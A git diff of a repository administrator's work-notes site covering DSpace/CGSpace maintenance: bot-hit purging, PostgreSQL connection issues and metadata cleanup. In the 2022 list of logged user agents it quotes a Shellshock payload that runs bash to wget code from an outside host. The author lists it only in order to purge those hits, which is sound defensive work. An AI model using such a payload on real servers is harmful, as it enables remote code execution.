diff --git a/content/posts/2022-03.md b/content/posts/2022-03.md index 74c121c0a..eca29392a 100644 --- a/content/posts/2022-03.md +++ b/content/posts/2022-03.md @@ -18,4 +18,56 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > +## 2022-03-04 + +- Looking over the CGSpace Solr statistics from 2022-02 + - I see a few new bots, though once I expanded my search for user agents with "www" in the name I found so many more! + - Here are some of the more prevalent or weird ones: + - axios/0.21.1 + - Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com) + - Nutraspace/Nutch-1.2 (www.nutraspace.com) + - Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com) + - Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com + - Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/) + - Crowsnest/0.5 (+http://www.crowsnest.tv/) + - Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com + - metha/0.2.27 + - ZaloPC-win32-24v454 + - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x + - ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org) + - FullStoryBot/1.0 (+https://www.fullstory.com) + - Link Validity Check From: http://www.usgs.gov + - OSPScraper (+https://www.opensyllabusproject.org) + - () { :;}; /bin/bash -c \"wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832\" + - I submitted [a pull request to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/52) with some of these +- I purged a bunch of hits from the stats using the `check-spider-hits.sh` script: + +```console +]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p +Purging 6 hits from scalaj-http in statistics +Purging 5 hits from lua-resty-http in statistics +Purging 9 hits from AHC in statistics +Purging 7 hits from acebookexternalhit in statistics +Purging 1011 hits from axios\/[0-9] in statistics +Purging 2216 hits from Faveeo\/[0-9] in statistics +Purging 1164 hits from Moreover\/[0-9] in statistics +Purging 740 hits from Exploratodo\/[0-9] in statistics +Purging 585 hits from GroupHigh\/[0-9] in statistics +Purging 438 hits from Crowsnest\/[0-9] in statistics +Purging 1326 hits from nbertaupete95 in statistics +Purging 182 hits from metha\/[0-9] in statistics +Purging 68 hits from ZaloPC-win32-24v454 in statistics +Purging 1644 hits from Firefox\/x\.x in statistics +Purging 678 hits from ZoteroTranslationServer in statistics +Purging 27 hits from FullStoryBot in statistics +Purging 26 hits from Link Validity Check in statistics +Purging 26 hits from OSPScraper in statistics +Purging 1 hits from 3137382e37392e3138372e313832 in statistics +Purging 2755 hits from Nutch-[0-9] in statistics + +Total number of bot hits purged: 12914 +``` + +- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project + diff --git a/docs/2015-11/index.html b/docs/2015-11/index.html index 0b48d1474..a0dba88bb 100644 --- a/docs/2015-11/index.html +++ b/docs/2015-11/index.html @@ -34,7 +34,7 @@ Last week I had increased the limit from 30 to 60, which seemed to help, but now $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace 78 "/> - + @@ -126,7 +126,7 @@ $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspac
  • Looks like DSpace exhausted its PostgreSQL connection pool
  • Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
  • -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
     78
     
    -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
     96
     
    • For some reason the number of idle connections is very high since we upgraded to DSpace 5
    • @@ -167,12 +167,12 @@ location ~ /(themes|static|aspects/ReportingSuite) {
    • Need to check /about on CGSpace, as it’s blank on my local test server and we might need to add something there
    • CGSpace has been up and down all day due to PostgreSQL idle connections (current DSpace pool is 90):
    -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
     93
     
    • I looked closer at the idle connections and saw that many have been idle for hours (current time on server is 2015-11-25T20:20:42+0000):
    -
    $ psql -c 'SELECT * from pg_stat_activity;' | less -S
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | less -S
     datid | datname  |  pid  | usesysid | usename  | application_name | client_addr | client_hostname | client_port |         backend_start         |          xact_start           |
     -------+----------+-------+----------+----------+------------------+-------------+-----------------+-------------+-------------------------------+-------------------------------+---
     20951 | cgspace  | 10966 |    18205 | cgspace  |                  | 127.0.0.1   |                 |       37731 | 2015-11-25 13:13:02.837624+00 |                               | 20
    @@ -197,7 +197,7 @@ datid | datname  |  pid  | usesysid | usename  | application_name | client_addr
     
  • Monitoring e-mailed in the evening to say CGSpace was down
  • Idle connections in PostgreSQL again:
  • -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
     66
     
    • At the time, the current DSpace pool size was 50…
    • @@ -215,7 +215,7 @@ db.statementpool = true
    • And idle connections:
    -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
     49
     
    • Perhaps I need to start drastically increasing the connection limits—like to 300—to see if DSpace’s thirst can ever be quenched
    • diff --git a/docs/2015-12/index.html b/docs/2015-12/index.html index c1bbaed7e..4c9853f03 100644 --- a/docs/2015-12/index.html +++ b/docs/2015-12/index.html @@ -36,7 +36,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less -rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo -rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz "/> - + @@ -137,7 +137,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
    • CGSpace went down again (due to PostgreSQL idle connections of course)
    • Current database settings for DSpace are db.maxconnections = 30 and db.maxidle = 8, yet idle connections are exceeding this:
    -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
     39
     
    • I restarted PostgreSQL and Tomcat and it’s back
    • @@ -189,7 +189,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
    • CGSpace very slow, and monitoring emailing me to say its down, even though I can load the page (very slowly)
    • Idle postgres connections look like this (with no change in DSpace db settings lately):
    -
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
    +
    $ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
     29
     
    • I restarted Tomcat and postgres…
    • @@ -214,7 +214,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
    • CGSpace has been up and down all day and REST API is completely unresponsive
    • PostgreSQL idle connections are currently:
    -
    postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
    +
    postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
     28
     
    • I have reverted all the pgtune tweaks from the other day, as they didn’t fix the stability issues, so I’d rather not have them introducing more variables into the equation
    • diff --git a/docs/2016-01/index.html b/docs/2016-01/index.html index 5dc10cc9b..f84804af9 100644 --- a/docs/2016-01/index.html +++ b/docs/2016-01/index.html @@ -28,7 +28,7 @@ Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_ I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated. Update GitHub wiki for documentation of maintenance tasks. "/> - + @@ -135,7 +135,7 @@ Update GitHub wiki for documentation of maintenance tasks.
    • Tweak date-based facets to show more values in drill-down ranges (#162)
    • Need to remember to clear the Cocoon cache after deployment or else you don’t see the new ranges immediately
    • Set up recipe on IFTTT to tweet new items from the CGSpace Atom feed to my twitter account
    • -
    • Altmetrics' support for Handles is kinda weak, so they can’t associate our items with DOIs until they are tweeted or blogged, etc first.
    • +
    • Altmetrics’ support for Handles is kinda weak, so they can’t associate our items with DOIs until they are tweeted or blogged, etc first.

    2016-01-21

      diff --git a/docs/2016-02/index.html b/docs/2016-02/index.html index e9eb2e083..88805586e 100644 --- a/docs/2016-02/index.html +++ b/docs/2016-02/index.html @@ -38,7 +38,7 @@ I noticed we have a very interesting list of countries on CGSpace: Not only are there 49,000 countries, we have some blanks (25)… Also, lots of things like “COTE D`LVOIRE” and “COTE D IVOIRE” "/> - + @@ -145,15 +145,15 @@ Also, lots of things like “COTE D`LVOIRE” and “COTE D IVOIRE&r
    • In this case our country field is 78
    • Now find all resources with type 2 (item) that have null/empty values for that field:
    -
    dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
    +
    dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
     
    • Then you can find the handle that owns it from its resource_id:
    -
    dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
    +
    dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
     
    • It’s 25 items so editing in the web UI is annoying, let’s try SQL!
    -
    dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
    +
    dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
     DELETE 25
     
    • After that perhaps a regular dspace index-discovery (no -b) should suffice…
    • @@ -198,7 +198,7 @@ $ /opt/brew/Cellar/tomcat/8.0.30/bin/catalina start
    • Add CATALINA_OPTS in /opt/brew/Cellar/tomcat/8.0.30/libexec/bin/setenv.sh, as this script is sourced by the catalina startup script
    • For example:
    -
    CATALINA_OPTS="-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8"
    +
    CATALINA_OPTS="-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8"
     
    • After verifying that the site is working, start a full index:
    @@ -253,7 +253,7 @@ Swap: 255 57 198
  • There are 1200 records that have PDFs, and will need to be imported into CGSpace
  • I created a filename column based on the dc.identifier.url column using the following transform:
  • -
    value.split('/')[-1]
    +
    value.split('/')[-1]
     
    • Then I wrote a tool called generate-thumbnails.py to download the PDFs and generate thumbnails for them, for example:
    @@ -278,13 +278,13 @@ Processing 64195.pdf
  • Looking at CIAT’s records again, there are some files linking to PDFs on Slide Share, Embrapa, UEA UK, and Condesan, so I’m not sure if we can use those
  • 265 items have dirty, URL-encoded filenames:
  • -
    $ ls | grep -c -E "%"
    +
    $ ls | grep -c -E "%"
     265
     
    • I suggest that we import ~850 or so of the clean ones first, then do the rest after I can find a clean/reliable way to decode the filenames
    • This python2 snippet seems to work in the CLI, but not so well in OpenRefine:
    -
    $ python -c "import urllib, sys; print urllib.unquote(sys.argv[1])" CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
    +
    $ python -c "import urllib, sys; print urllib.unquote(sys.argv[1])" CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
     CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
     
    • Merge pull requests for submission form theming (#178) and missing center subjects in XMLUI item views (#176)
    • @@ -294,7 +294,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
      • Turns out OpenRefine has an unescape function!
      -
      value.unescape("url")
      +
      value.unescape("url")
       
      • This turns the URLs into human-readable versions that we can use as proper filenames
      • Run web server and system updates on DSpace Test and reboot
      • @@ -302,7 +302,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
      • Then you create a facet for blank values on each column, show the rows that have values for one and not the other, then transform each independently to have the contents of the other, with “||” in between
      • Work on Python script for parsing and downloading PDF records from dc.identifier.url
      • To get filenames from dc.identifier.url, create a new column based on this transform: forEach(value.split('||'), v, v.split('/')[-1]).join('||')
      • -
      • This also works for records that have multiple URLs (separated by “||")
      • +
      • This also works for records that have multiple URLs (separated by “||”)

      2016-02-17

        @@ -325,7 +325,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
        • To change Spanish accents to ASCII in OpenRefine:
        -
        value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
        +
        value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
         
        • But actually, the accents might not be an issue, as I can successfully import files containing Spanish accents on my Mac
        • On closer inspection, I can import files with the following names on Linux (DSpace Test):
        • @@ -353,7 +353,7 @@ Bitstream: tést señora alimentación.pdf
        • Looking at the filenames for the CIAT Reports, some have some really ugly characters, like: ' or , or = or [ or ] or ( or ) or _.pdf or ._ etc
        • It’s tricky to parse those things in some programming languages so I’d rather just get rid of the weird stuff now in OpenRefine:
        -
        value.replace("'",'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
        +
        value.replace("'",'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
         
        • Finally import the 1127 CIAT items into CGSpace: https://cgspace.cgiar.org/handle/10568/35710
        • Re-deploy CGSpace with the Google Scholar fix, but I’m waiting on the Atmire fixes for now, as the branch history is ugly
        • diff --git a/docs/2016-03/index.html b/docs/2016-03/index.html index 3f914d7dc..c731dfece 100644 --- a/docs/2016-03/index.html +++ b/docs/2016-03/index.html @@ -28,7 +28,7 @@ Looking at issues with author authorities on CGSpace For some reason we still have the index-lucene-update cron job active on CGSpace, but I’m pretty sure we don’t need it as of the latest few versions of Atmire’s Listings and Reports module Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server "/> - + @@ -128,7 +128,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
        • I identified one commit that causes the issue and let them know
        • Restart DSpace Test, as it seems to have crashed after Sisay tried to import some CSV or zip or something:
        -
        Exception in thread "Lucene Merge Thread #19" org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
        +
        Exception in thread "Lucene Merge Thread #19" org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
         

        2016-03-08

        • Add a few new filters to Atmire’s Listings and Reports module (#180)
        • @@ -261,7 +261,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja -
          Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
          +
          Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
           
          • I can reproduce the same error on DSpace Test and on my Mac
          • Looks to be an issue with the Atmire modules, I’ve submitted a ticket to their tracker.
          • diff --git a/docs/2016-04/index.html b/docs/2016-04/index.html index 39b956379..5d4cf4f66 100644 --- a/docs/2016-04/index.html +++ b/docs/2016-04/index.html @@ -32,7 +32,7 @@ After running DSpace for over five years I’ve never needed to look in any This will save us a few gigs of backup space we’re paying for on S3 Also, I noticed the checker log has some errors we should pay attention to: "/> - + @@ -150,7 +150,7 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290 ******************************************************
          • So this would be the tomcat7 Unix user, who seems to have a default limit of 1024 files in its shell
          • -
          • For what it’s worth, we have been setting the actual Tomcat 7 process' limit to 16384 for a few years (in /etc/default/tomcat7)
          • +
          • For what it’s worth, we have been setting the actual Tomcat 7 process’ limit to 16384 for a few years (in /etc/default/tomcat7)
          • Looks like cron will read limits from /etc/security/limits.* so we can do something for the tomcat7 user there
          • Submit pull request for Tomcat 7 limits in Ansible dspace role (#30)
          @@ -159,10 +159,10 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
        • Reduce Amazon S3 storage used for logs from 46 GB to 6GB by deleting a bunch of logs we don’t need!
        # s3cmd ls s3://cgspace.cgiar.org/log/ > /tmp/s3-logs.txt
        -# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        -# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        -# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        -# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        +# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        +# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        +# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
        +# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
         
        • Also, adjust the cron jobs for backups so they only backup dspace.log and some stats files (.dat)
        • Try to do some metadata field migrations using the Atmire batch UI (dc.Species → cg.species) but it took several hours and even missed a few records
        • @@ -199,13 +199,13 @@ UPDATE 51258
        • Looking at the DOI issue reported by Leroy from CIAT a few weeks ago
        • It seems the dx.doi.org URLs are much more proper in our repository!
        -
        dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
        +
        dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
          count
         -------
           5638
         (1 row)
         
        -dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
        +dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
          count
         -------
              3
        @@ -231,11 +231,11 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and t
         
      • I decided to keep the set of subjects that had FMD and RANGELANDS added, as it appears to have been requested to have been added, and might be the newer list
      • I found 226 blank metadatavalues:
      -
      dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
      +
      dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
       
      • I think we should delete them and do a full re-index:
      -
      dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
      +
      dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
       DELETE 226
       
      • I deleted them on CGSpace but I’ll wait to do the re-index as we’re going to be doing one in a few days for the metadata changes anyways
      • @@ -294,7 +294,7 @@ UPDATE metadatavalue SET metadata_field_id=215 WHERE metadata_field_id=106 UPDATE 3872 UPDATE metadatavalue SET metadata_field_id=217 WHERE metadata_field_id=108 UPDATE 46075 -$ JAVA_OPTS="-Xms512m -Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace index-discovery -bf +$ JAVA_OPTS="-Xms512m -Xmx512m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace index-discovery -bf
      • CGSpace was down but I’m not sure why, this was in catalina.out:
      @@ -387,7 +387,7 @@ UPDATE 46075
    • Basically, this gives us the ability to use the latest upstream stable 9.3.x release (currently 9.3.12)
    • Looking into the REST API errors again, it looks like these started appearing a few days ago in the tens of thousands:
    -
    $ grep -c "Aborting context in finally statement" dspace.log.2016-04-20
    +
    $ grep -c "Aborting context in finally statement" dspace.log.2016-04-20
     21252
     
    • I found a recent discussion on the DSpace mailing list and I’ve asked for advice there
    • @@ -423,7 +423,7 @@ UPDATE 46075
    • Looks like the last one was “down” from about four hours ago
    • I think there must be something with this REST stuff:
    -
    # grep -c "Aborting context in finally statement" dspace.log.2016-04-*
    +
    # grep -c "Aborting context in finally statement" dspace.log.2016-04-*
     dspace.log.2016-04-01:0
     dspace.log.2016-04-02:0
     dspace.log.2016-04-03:0
    diff --git a/docs/2016-05/index.html b/docs/2016-05/index.html
    index edad6ad1f..330d7e837 100644
    --- a/docs/2016-05/index.html
    +++ b/docs/2016-05/index.html
    @@ -34,7 +34,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
     # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
     3168
     "/>
    -
    +
     
     
         
    @@ -126,7 +126,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
     
  • I have blocked access to the API now
  • There are 3,000 IPs accessing the REST API in a 24-hour period!
  • -
    # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
    +
    # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
     3168
     
    • The two most often requesters are in Ethiopia and Colombia: 213.55.99.121 and 181.118.144.29
    • @@ -166,8 +166,8 @@ LE_RESULT=$? $SERVICE_BIN nginx start -if [[ "$LE_RESULT" != 0 ]]; then - echo 'Automated renewal failed:' +if [[ "$LE_RESULT" != 0 ]]; then + echo 'Automated renewal failed:' cat /var/log/letsencrypt/renew.log @@ -240,7 +240,7 @@ fi
    • Found ~200 messed up CIAT values in dc.publisher:
    -
    # select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to "%  %";
    +
    # select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to "%  %";
     

    2016-05-13

    • More theorizing about CGcore
    • @@ -259,7 +259,7 @@ fi
    • They have thumbnails on Flickr and elsewhere
    • In OpenRefine I created a new filename column based on the thumbnail column with the following GREL:
    -
    if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
    +
    if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
     
    • Because ~400 records had the same filename on Flickr (hqdefault.jpg) but different UUIDs in the URL
    • So for the hqdefault.jpg ones I just take the UUID (-2) and use it as the filename
    • @@ -269,7 +269,7 @@ fi
      • More quality control on filename field of CCAFS records to make processing in shell and SAFBuilder more reliable:
      -
      value.replace('_','').replace('-','')
      +
      value.replace('_','').replace('-','')
       
      • We need to hold off on moving dc.Species to cg.species because it is only used for plants, and might be better to move it to something like cg.species.plant
      • And dc.identifier.fund is MOSTLY used for CPWF project identifier but has some other sponsorship things @@ -281,17 +281,17 @@ fi
    -
    # select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
    +
    # select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
     

    2016-05-20

    • More work on CCAFS Video and Images records
    • For SAFBuilder we need to modify filename column to have the thumbnail bundle:
    -
    value + "__bundle:THUMBNAIL"
    +
    value + "__bundle:THUMBNAIL"
     
    • Also, I fixed some weird characters using OpenRefine’s transform with the following GREL:
    -
    value.replace(/\u0081/,'')
    +
    value.replace(/\u0081/,'')
     
    • And then import to CGSpace:
    -
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &> /tmp/ccafs-images-may30.log
    +
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &> /tmp/ccafs-images-may30.log
     
    • But now we have double authors for “CGIAR Research Program on Climate Change, Agriculture and Food Security” in the authority
    • I’m trying to do a Discovery index before messing with the authority index
    • @@ -322,12 +322,12 @@ $ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~
    • Run system updates on DSpace Test, re-deploy code, and reboot the server
    • Clean up and import ~200 CTA records to CGSpace via CSV like:
    -
    $ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
    +
    $ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
     $ /home/cgspace.cgiar.org/bin/dspace metadata-import -e aorth@mjanja.ch -f ~/CTA-May30/CTA-42229.csv &> ~/CTA-May30/CTA-42229.log
     
    • Discovery indexing took a few hours for some reason, and after that I started the index-authority script
    -
    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace index-authority
    +
    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace index-authority
     

    2016-05-31

    • The index-authority script ran over night and was finished in the morning
    • diff --git a/docs/2016-06/index.html b/docs/2016-06/index.html index f941e4199..8c132040d 100644 --- a/docs/2016-06/index.html +++ b/docs/2016-06/index.html @@ -34,7 +34,7 @@ This is their publications set: http://ebrary.ifpri.org/oai/oai.php?verb=ListRec You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship "/> - + @@ -129,7 +129,7 @@ Working on second phase of metadata migration, looks like this will work for mov
    • You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
    • Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
    -
    dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
    +
    dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
     UPDATE 497
     dspacetest=# update metadatavalue set metadata_field_id=29 where metadata_field_id=75;
     UPDATE 14
    @@ -160,7 +160,7 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
     
  • So the only difference is the “confidence”
  • Ok, well THAT is interesting:
  • -
    dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
    +
    dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
      text_value |              authority               | confidence
     ------------+--------------------------------------+------------
      Orth, A.   | ab606e3a-2b04-4c7d-9423-14beccf54257 |         -1
    @@ -180,13 +180,13 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
     
    • And now an actually relevent example:
    -
    dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
    +
    dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
      count
     -------
        707
     (1 row)
     
    -dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
    +dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
      count
     -------
        253
    @@ -194,7 +194,7 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and te
     
    • Trying something experimental:
    -
    dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
    +
    dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
     UPDATE 960
     
    -
    $ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
    +
    $ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
     
    • Write to Atmire about the use of atmire.orcid.id to see if we can change it
    • Seems to be a virtual field that is queried from the authority cache… hmm
    • @@ -263,9 +263,9 @@ UPDATE 960
    • It looks like the values are documented in Choices.java
    • Experiment with setting all 960 CCAFS author values to be 500:
    -
    dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
    +
    dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
     
    -dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
    +dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
     UPDATE 960
     
    • After the database edit, I did a full Discovery re-index
    • @@ -320,7 +320,7 @@ UPDATE 960
